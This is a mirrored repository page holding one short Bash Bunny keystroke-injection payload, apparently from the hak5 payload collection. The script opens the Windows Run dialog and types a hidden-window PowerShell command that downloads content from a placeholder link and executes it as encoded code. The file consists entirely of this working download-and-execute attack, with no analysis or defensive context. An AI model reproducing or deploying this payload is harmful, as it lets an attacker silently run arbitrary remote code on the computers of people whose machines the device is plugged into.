mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
6 lines
154 B
Plaintext
6 lines
154 B
Plaintext
DELAY 2000
|
|
GUI r
|
|
DELAY 200
|
|
STRING powershell -windowstyle hidden $u='YOUR_LINK';$r=Invoke-WebRequest -Uri $u;powershell -nop -e $r.content
|
|
DELAY 100
|
|
ENTER |